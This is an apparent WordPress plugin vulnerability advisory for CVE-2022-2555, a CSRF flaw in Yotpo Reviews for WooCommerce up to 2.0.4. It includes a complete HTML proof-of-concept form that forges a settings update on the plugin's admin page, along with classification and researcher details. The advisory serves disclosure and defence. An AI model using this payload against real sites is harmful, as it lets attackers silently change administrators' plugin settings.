WordPress Plugin Vulnerabilities

Yotpo Reviews for WooCommerce <= 2.0.4 - Arbitrary Settings Update via CSRF

Description

The plugin lacks nonce check when updating its settings, which could allow attacker to make a logged in admin change them via a CSRF attack.

Proof of Concept

Use the following form to abuse the lack of nonce:

<html>
   <form enctype="application/x-www-form-urlencoded" method="POST" action="http://example.com/wp-admin/admin.php?page=yotpo-debug">
      <table>
         <tr>
            <td>app_key</td>
            <td><input type="text" value="123123123" name="app_key"></td>
         </tr>
         <tr>
            <td>authenticated</td>
            <td><input type="text" value=" true" name="authenticated"></td>
         </tr>
         <tr>
            <td>widget_location</td>
            <td><input type="text" value="footer" name="widget_location"></td>
         </tr>
         <tr>
            <td>language_code</td>
            <td><input type="text" value="en" name="language_code"></td>
         </tr>
         <tr>
            <td>widget_tab_name</td>
            <td><input type="text" value="Reviews" name="widget_tab_name"></td>
         </tr>
         <tr>
            <td>bottom_line_enabled_product</td>
            <td><input type="text" value=" true" name="bottom_line_enabled_product"></td>
         </tr>
         <tr>
            <td>qna_enabled_product</td>
            <td><input type="text" value=" true" name="qna_enabled_product"></td>
         </tr>
         <tr>
            <td>bottom_line_enabled_category</td>
            <td><input type="text" value=" true" name="bottom_line_enabled_category"></td>
         </tr>
         <tr>
            <td>yotpo_language_as_site</td>
            <td><input type="text" value="1" name="yotpo_language_as_site"></td>
         </tr>
         <tr>
            <td>show_submit_past_orders</td>
            <td><input type="text" value="" name="show_submit_past_orders"></td>
         </tr>
         <tr>
            <td>yotpo_order_status</td>
            <td><input type="text" value="wc-completed" name="yotpo_order_status"></td>
         </tr>
         <tr>
            <td>disable_native_review_system</td>
            <td><input type="text" value=" true" name="disable_native_review_system"></td>
         </tr>
         <tr>
            <td>debug_mode</td>
            <td><input type="text" value=" true" name="debug_mode"></td>
         </tr>
         <tr>
            <td>debug_level</td>
            <td><input type="text" value="info" name="debug_level"></td>
         </tr>
         <tr>
            <td>main_widget_hook</td>
            <td><input type="text" value="woocommerce_after_single_product" name="main_widget_hook"></td>
         </tr>
         <tr>
            <td>main_widget_priority</td>
            <td><input type="text" value="10" name="main_widget_priority"></td>
         </tr>
         <tr>
            <td>product_bottomline_hook</td>
            <td><input type="text" value="woocommerce_single_product_summary" name="product_bottomline_hook"></td>
         </tr>
         <tr>
            <td>product_bottomline_priority</td>
            <td><input type="text" value="7" name="product_bottomline_priority"></td>
         </tr>
         <tr>
            <td>product_qna_hook</td>
            <td><input type="text" value="woocommerce_single_product_summary" name="product_qna_hook"></td>
         </tr>
         <tr>
            <td>product_qna_priority</td>
            <td><input type="text" value="8" name="product_qna_priority"></td>
         </tr>
         <tr>
            <td>category_bottomline_hook</td>
            <td><input type="text" value="woocommerce_after_shop_loop_item" name="category_bottomline_hook"></td>
         </tr>
         <tr>
            <td>category_bottomline_priority</td>
            <td><input type="text" value="7" name="category_bottomline_priority"></td>
         </tr>
         <tr>
            <td>timeframe_from</td>
            <td><input type="text" value="90" name="timeframe_from"></td>
         </tr>
         <tr>
            <td>timeframe_to</td>
            <td><input type="text" value="0" name="timeframe_to"></td>
         </tr>
         <tr>
            <td>order_submission_method</td>
            <td><input type="text" value="hook" name="order_submission_method"></td>
         </tr>
         <tr>
            <td>widget_jsinject_selector</td>
            <td><input type="text" value="section#primary" name="widget_jsinject_selector"></td>
         </tr>
         <tr>
            <td>jsinject_selector_rating</td>
            <td><input type="text" value=".entry-title" name="jsinject_selector_rating"></td>
         </tr>
         <tr>
            <td>jsinject_selector_qna</td>
            <td><input type="text" value=".entry-title" name="jsinject_selector_qna"></td>
         </tr>
         <tr>
            <td>update_settings</td>
            <td><input type="text" value="yeah" name="update_settings"></td>
         </tr>
      </table>
      <input type="submit" value="http://localhost/wp-admin/admin.php?page=yotpo-debug">
   </form>
</html>

Affects Plugins

Plugin icon
yotpo-reviews-for-woocommerce
No known fix

References

CVE
CVE-2022-2555

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Johannes Gangsö
Submitter
Johannes Gangsö
Submitter website
https://profiles.wordpress.org/jgangso/
Submitter twitter
jgangso
Verified
Yes
WPVDB ID
7ec9e493-bc48-4a5d-8c7e-34beaba892ae

Timeline

Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2023-04-29 (about 1 years ago)

Other

Published
Title
Published
2022-08-02
Title
uContext for Amazon <= 3.9.1 - Stored Cross-Site Scripting via CSRF
Published
2023-10-17
Title
Stripe Gateway < 7.6.1 - Cross-Site Request Forgery
Published
2023-09-05
Title
wpCentral <= 1.5.7 - Settings Update via CSRF
Published
2023-07-17
Title
Inactive User Deleter < 1.60 - Cross-Site Request Forgery
Published
2024-04-11
Title
Convert Post Types <= 1.4 - Cross-Site Request Forgery